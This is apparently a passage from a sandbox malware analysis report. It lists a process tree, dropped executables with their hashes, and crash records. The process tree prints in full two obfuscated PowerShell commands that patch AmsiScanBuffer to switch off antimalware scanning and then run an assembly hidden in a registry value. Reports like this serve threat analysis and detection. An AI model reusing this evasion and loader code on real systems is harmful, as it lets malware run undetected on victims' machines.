$_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+'dl'+'l'+'')}).GetType('M'+'i'+'c'+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+'W'+''+[Char](105)+'n3'+[Char](50)+'.U'+[Char](110)+''+[Char](115)+'a'+'f'+'e'+[Char](121)+''+'R'+''+[Char](100)+''+'J'+''+[Char](106)+'H'+[Char](85)+''+'A'+''+[Char](106)+''+'b'+''+[Char](118)+''+[Char](87)+''+'O'+'');$ienxcdaRicLkOq=$yRdJjHUAjbvWO.GetMethod(''+[Char](105)+''+[Char](101)+'n'+[Char](120)+''+[Char](99)+'d'+[Char](97)+''+[Char](82)+''+'i'+''+[Char](99)+''+[Char](76)+''+[Char](107)+''+[Char](79)+''+[Char](113)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QPEDhTJkcstLbnIbpnc=PZcsGHnLCyjR @([String])([IntPtr]);$hIznRrOMnXMRaDSOtejkAv=PZcsGHnLCyjR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KlZMldYplTM=$yRdJjHUAjbvWO.GetMethod(''+'G'+'et'+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+'r'+[Char](110)+'e'+[Char](108)+'32.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$sgdYaFWQFfkKXC=$ienxcdaRicLkOq.Invoke($Null,@([Object]$KlZMldYplTM,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+'r'+'a'+''+'r'+''+[Char](121)+''+'A'+'')));$fUxlUxtCsmCWXdgKg=$ienxcdaRicLkOq.Invoke($Null,@([Object]$KlZMldYplTM,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+'t'+'')));$zEpKMDz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sgdYaFWQFfkKXC,$QPEDhTJkcstLbnIbpnc).Invoke('a'+[Char](109)+''+'s'+''+'i'+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$NooSeyPvzsEJCHtPL=$ienxcdaRicLkOq.Invoke($Null,@([Object]$zEpKMDz,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$hMivxdOyKq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fUxlUxtCsmCWXdgKg,$hIznRrOMnXMRaDSOtejkAv).Invoke($NooSeyPvzsEJCHtPL,[uint32]8,4,[ref]$hMivxdOyKq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NooSeyPvzsEJCHtPL,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fUxlUxtCsmCWXdgKg,$hIznRrOMnXMRaDSOtejkAv).Invoke($NooSeyPvzsEJCHtPL,[uint32]8,0x20,[ref]$hMivxdOyKq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+'a'+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                2⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:3476
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  3⤵
                                                                                                                    PID:4716
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:itssArJzYKtm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UeixymlXfMniwP,[Parameter(Position=1)][Type]$MEFmrImxqZ)$kKHretvhiQY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+'l'+[Char](101)+'c'+'t'+'e'+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+',P'+[Char](117)+''+'b'+''+'l'+''+'i'+'c'+[Char](44)+''+[Char](83)+'e'+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+'n'+'s'+''+'i'+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](65)+'u'+[Char](116)+''+'o'+'C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$kKHretvhiQY.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'l'+[Char](78)+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+'i'+''+'d'+''+'e'+'By'+'S'+'ig'+[Char](44)+''+'P'+'u'+'b'+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$UeixymlXfMniwP).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');$kKHretvhiQY.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+'l'+'ic,H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+','+[Char](86)+'ir'+[Char](116)+'u'+'a'+''+[Char](108)+'',$MEFmrImxqZ,$UeixymlXfMniwP).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+'me'+','+''+[Char](77)+'an'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $kKHretvhiQY.CreateType();}$bsYtxlSTyQuqQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+'m'+'.'+'d'+'l'+'l')}).GetType('Mi'+'c'+''+'r'+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+'2.U'+[Char](110)+''+[Char](115)+''+'a'+'f'+[Char](101)+'b'+[Char](115)+'Y'+[Char](116)+'x'+[Char](108)+''+[Char](83)+'T'+'y'+''+[Char](81)+'uqQ');$fdZuKnCiZKxUae=$bsYtxlSTyQuqQ.GetMethod(''+'f'+''+[Char](100)+''+[Char](90)+''+'u'+''+[Char](75)+''+[Char](110)+''+[Char](67)+'i'+'Z'+'KxU'+'a'+'e',[Reflection.BindingFlags]'P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'S'+'t'+''+'a'+''+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PIoOHsTOqTrbMlCqCjk=itssArJzYKtm @([String])([IntPtr]);$PvrqzJaJCnsbybnURlHKGi=itssArJzYKtm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IsfvQcmTUVa=$bsYtxlSTyQuqQ.GetMethod('G'+'e'+''+'t'+''+[Char](77)+'od'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+'n'+'e'+''+'l'+'32.'+[Char](100)+''+[Char](108)+'l')));$uFGZmqOlePSNCs=$fdZuKnCiZKxUae.Invoke($Null,@([Object]$IsfvQcmTUVa,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+'a'+''+'r'+''+'y'+''+'A'+'')));$tEaEjXfteHkSpuRWu=$fdZuKnCiZKxUae.Invoke($Null,@([Object]$IsfvQcmTUVa,[Object]('Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$YWZCEZN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uFGZmqOlePSNCs,$PIoOHsTOqTrbMlCqCjk).Invoke(''+[Char](97)+''+'m'+'s'+'i'+''+[Char](46)+''+'d'+''+'l'+''+'l'+'');$AiPglliwvaOFasDAF=$fdZuKnCiZKxUae.Invoke($Null,@([Object]$YWZCEZN,[Object](''+'A'+'msi'+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+'f'+''+'e'+''+[Char](114)+'')));$xpNbcpkKdu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tEaEjXfteHkSpuRWu,$PvrqzJaJCnsbybnURlHKGi).Invoke($AiPglliwvaOFasDAF,[uint32]8,4,[ref]$xpNbcpkKdu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AiPglliwvaOFasDAF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tEaEjXfteHkSpuRWu,$PvrqzJaJCnsbybnURlHKGi).Invoke($AiPglliwvaOFasDAF,[uint32]8,0x20,[ref]$xpNbcpkKdu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+'W'+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                  2⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:4288
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5024
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                1⤵
                                                                                                                  PID:440
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                  1⤵
                                                                                                                    PID:992
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                    PID:3184
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 880 -ip 880
                                                                                                                      2⤵
                                                                                                                        PID:1240
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1580 -ip 1580
                                                                                                                        2⤵
                                                                                                                          PID:4052
                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 432 -p 3456 -ip 3456
                                                                                                                          2⤵
                                                                                                                            PID:4508
                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 540 -p 3308 -ip 3308
                                                                                                                            2⤵
                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                            PID:2528
                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 432 -p 2456 -ip 2456
                                                                                                                            2⤵
                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                            PID:2276
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                          1⤵
                                                                                                                            PID:3420
                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                            1⤵
                                                                                                                              PID:2456
                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 2456 -s 592
                                                                                                                                2⤵
                                                                                                                                • Program crash
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:1428

                                                                                                                            Network

                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER7BEA.tmp.csv
                                                                                                                                    Filesize

                                                                                                                                    35KB

                                                                                                                                    MD5

                                                                                                                                    a0d12be155500c67d4e122c41e47a745

                                                                                                                                    SHA1

                                                                                                                                    12cc7a9360fe6c48ef3362345c7cdb4d7a37caaa

                                                                                                                                    SHA256

                                                                                                                                    ce8aa0941a26bebe408239fb6735a39c6dcd497622d8381e6f49bab5a0b66b3a

                                                                                                                                    SHA512

                                                                                                                                    3e376bc70e27ec78843ceaf35c4c96afaa9c6c4d1b9be5bdaae06ef9796c38ab1f9014e7e45255cea88afbbfd1d9dc8ae02de88e3c3d7c0f935ba1df352952ca

                                                                                                                                    Download Submit

                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C29.tmp.txt
                                                                                                                                    Filesize

                                                                                                                                    13KB

                                                                                                                                    MD5

                                                                                                                                    7345d1a475715ec55c3b7a5fe59f720d

                                                                                                                                    SHA1

                                                                                                                                    bde176029c37bb79bfdd15787d0a9f200db4c6bd

                                                                                                                                    SHA256

                                                                                                                                    589f42506ac7a9095e61cf9ec089d91d079338ca5662c5ed91db7831e6da0e32

                                                                                                                                    SHA512

                                                                                                                                    2e7eeb09eaf96981efb03085f77cdc8faf5df53a760ff81f48d2078f647495a1ae643711ce699df8973283691637633f5f1094e30daaa1d87d5a859dbe8beb61

                                                                                                                                    Download Submit

                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER8457.tmp.csv
                                                                                                                                    Filesize

                                                                                                                                    37KB

                                                                                                                                    MD5

                                                                                                                                    a438a94209a09ad8240b80b4f6163b58

                                                                                                                                    SHA1

                                                                                                                                    e079a1112445c0232a1c047d9e31d59f53a957d1

                                                                                                                                    SHA256

                                                                                                                                    95891fe963f37461e41e81c4326c715109c241a573ce71f203a78b7573725006

                                                                                                                                    SHA512

                                                                                                                                    6a8b06aa9c7d971a2384a44e0e3a419c3e2f52304c6922c4c807288764fed7fcf0d4acf99ba248e74250dd0a4101e192bf6404f1f657b72f87b8c335fe1a4e3f

                                                                                                                                    Download Submit

                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER8487.tmp.txt
                                                                                                                                    Filesize

                                                                                                                                    13KB

                                                                                                                                    MD5

                                                                                                                                    03b23ad716c8491da5665893167b56c8

                                                                                                                                    SHA1

                                                                                                                                    37e5453443f929d74ceb340fb1ba7e9970467352

                                                                                                                                    SHA256

                                                                                                                                    0ca7b3bea4002eaf7caac51c7020ae2b7119d8b3cd0b20e42285766787314ee9

                                                                                                                                    SHA512

                                                                                                                                    cd128012366b4eb7c4bdc18bcce8ed2c8f2e973a31160bbf21820ecb7c65d62e11850cc12d9172e04cc94819b2c523fe8cacc9a24e1f880d29b3c4439e101c77

                                                                                                                                    Download Submit

                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER84C6.tmp.csv
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    dd0d42d23b4c30805c75815c69185f08

                                                                                                                                    SHA1

                                                                                                                                    62a3bb2968e57b9e0da134aced89ed6b3bd365b0

                                                                                                                                    SHA256

                                                                                                                                    8a988f7a323d08278173cff22ab3bc06eaa3b5b0e3887364d76147e429978bde

                                                                                                                                    SHA512

                                                                                                                                    47bfd2ec209ef97fedb8fee100bf3b5b454fa6ca12145ebce6f85cc9dccf80cfbe20536c37448920c7e84d5860f0ac1f9e5dc0557126f55170913101ece64730

                                                                                                                                    Download Submit

                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER8515.tmp.txt
                                                                                                                                    Filesize

                                                                                                                                    13KB

                                                                                                                                    MD5

                                                                                                                                    4f5533c26de6cc264935449dadf663b0

                                                                                                                                    SHA1

                                                                                                                                    a3eae55faef5051c539a36021e4cc7161f680496

                                                                                                                                    SHA256

                                                                                                                                    f7ec50b6b29a3d27373c2ebadd27acd45a0a3be900bbf2586247ea7cd3cc9ae4

                                                                                                                                    SHA512

                                                                                                                                    88cbec3116f773605908c4457b0e45e380c69e606b53745f3f06516dda781a17f4e02355f500b4b2ef1700fd962facf43f22ad95852a9ec1f46cd5861af5825f

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                    SHA1

                                                                                                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                    SHA256

                                                                                                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                    SHA512

                                                                                                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log
                                                                                                                                    Filesize

                                                                                                                                    226B

                                                                                                                                    MD5

                                                                                                                                    916851e072fbabc4796d8916c5131092

                                                                                                                                    SHA1

                                                                                                                                    d48a602229a690c512d5fdaf4c8d77547a88e7a2

                                                                                                                                    SHA256

                                                                                                                                    7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

                                                                                                                                    SHA512

                                                                                                                                    07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                    Filesize

                                                                                                                                    19KB

                                                                                                                                    MD5

                                                                                                                                    7b07f6a1ab26be365e31a8038efc73ec

                                                                                                                                    SHA1

                                                                                                                                    9f3667a5610eb52d7bfd11e007afc7e744d316c8

                                                                                                                                    SHA256

                                                                                                                                    f98f4cb7daa377872cd00bc77878e3adfeb49f03607356d78edc17841f73146f

                                                                                                                                    SHA512

                                                                                                                                    f3a69de1c405313fd3a127a7341c9a28030646540daccfe7d59c9c9626dbdba405218005b5532260e81d2092af5776e605012c46c9151ccc1471d5d584ba81e7

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                    Filesize

                                                                                                                                    948B

                                                                                                                                    MD5

                                                                                                                                    a7ce8cefc3f798abe5abd683d0ef26dd

                                                                                                                                    SHA1

                                                                                                                                    b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

                                                                                                                                    SHA256

                                                                                                                                    5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

                                                                                                                                    SHA512

                                                                                                                                    c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                                                                                    Filesize

                                                                                                                                    1.4MB

                                                                                                                                    MD5

                                                                                                                                    bb86a343080f9f4696c250ef31a18d9d

                                                                                                                                    SHA1

                                                                                                                                    43b2193dcb1d56eac73ba88a7b461822074192d6

                                                                                                                                    SHA256

                                                                                                                                    095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                                                                                                    SHA512

                                                                                                                                    24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                                                                                    Filesize

                                                                                                                                    1.4MB

                                                                                                                                    MD5

                                                                                                                                    bb86a343080f9f4696c250ef31a18d9d

                                                                                                                                    SHA1

                                                                                                                                    43b2193dcb1d56eac73ba88a7b461822074192d6

                                                                                                                                    SHA256

                                                                                                                                    095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                                                                                                    SHA512

                                                                                                                                    24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                                                    Filesize

                                                                                                                                    3.7MB

                                                                                                                                    MD5

                                                                                                                                    f5c51e7760315ad0f0238d268c03c60e

                                                                                                                                    SHA1

                                                                                                                                    85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                                                                                                    SHA256

                                                                                                                                    ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                                                                                                    SHA512

                                                                                                                                    d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                                                    Filesize

                                                                                                                                    3.7MB

                                                                                                                                    MD5

                                                                                                                                    f5c51e7760315ad0f0238d268c03c60e

                                                                                                                                    SHA1

                                                                                                                                    85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                                                                                                    SHA256

                                                                                                                                    ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                                                                                                    SHA512

                                                                                                                                    d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                                    Filesize

                                                                                                                                    1.4MB

                                                                                                                                    MD5

                                                                                                                                    b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                    SHA1

                                                                                                                                    f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                    SHA256

                                                                                                                                    dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                    SHA512

                                                                                                                                    1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                                    Filesize

                                                                                                                                    1.4MB

                                                                                                                                    MD5

                                                                                                                                    b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                    SHA1

                                                                                                                                    f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                    SHA256

                                                                                                                                    dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                    SHA512

                                                                                                                                    1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                                                                    Filesize

                                                                                                                                    455KB

                                                                                                                                    MD5

                                                                                                                                    ee0ad7cc2a5976a5c658da52092977a9

                                                                                                                                    SHA1

                                                                                                                                    c69b99d42a9f9886af74e6a75fd905a5d17d4792

                                                                                                                                    SHA256

                                                                                                                                    f0cc93428ff55575086b843e642c33283067a980fc9cb1f17afc3559b101ff1b

                                                                                                                                    SHA512

                                                                                                                                    ca7f8b1409156b7d1b143cfb33f64056a8c2a8ce401dc735c82828521922044f86680ca6c1b4b08955689c5ba11c94930fe64cce37258e621c7d47ee2dafea17

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                                                                    Filesize

                                                                                                                                    455KB

                                                                                                                                    MD5

                                                                                                                                    ee0ad7cc2a5976a5c658da52092977a9

                                                                                                                                    SHA1

                                                                                                                                    c69b99d42a9f9886af74e6a75fd905a5d17d4792

                                                                                                                                    SHA256

                                                                                                                                    f0cc93428ff55575086b843e642c33283067a980fc9cb1f17afc3559b101ff1b

                                                                                                                                    SHA512

                                                                                                                                    ca7f8b1409156b7d1b143cfb33f64056a8c2a8ce401dc735c82828521922044f86680ca6c1b4b08955689c5ba11c94930fe64cce37258e621c7d47ee2dafea17

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                    Filesize

                                                                                                                                    1.4MB

                                                                                                                                    MD5

                                                                                                                                    b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                    SHA1

                                                                                                                                    f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                    SHA256

                                                                                                                                    dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                    SHA512

                                                                                                                                    1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                    Filesize

                                                                                                                                    1.4MB

                                                                                                                                    MD5

                                                                                                                                    b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                    SHA1

                                                                                                                                    f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                    SHA256

                                                                                                                                    dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                    SHA512

                                                                                                                                    1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                                                    Filesize

                                                                                                                                    434B

                                                                                                                                    MD5

                                                                                                                                    4953180e05e9dcefd998fa281a9984fc

                                                                                                                                    SHA1

                                                                                                                                    71520b8d408d8abb7c852ecbca6051e677ff879f

                                                                                                                                    SHA256

                                                                                                                                    39998a38bce0adc0c01c0cae3f821755429adb4f340792c1a0e58a7dd95430ef

                                                                                                                                    SHA512

                                                                                                                                    3a4d59bb7a5e3eb3535237e6e0d892aeb9eed3915a66d1037b4bf936352183db0d4d87bbe049c92b949e7b7f6119cfa78cbc9c98adaa38ca3f6665c79f6ab7a8

                                                                                                                                    Download Submit

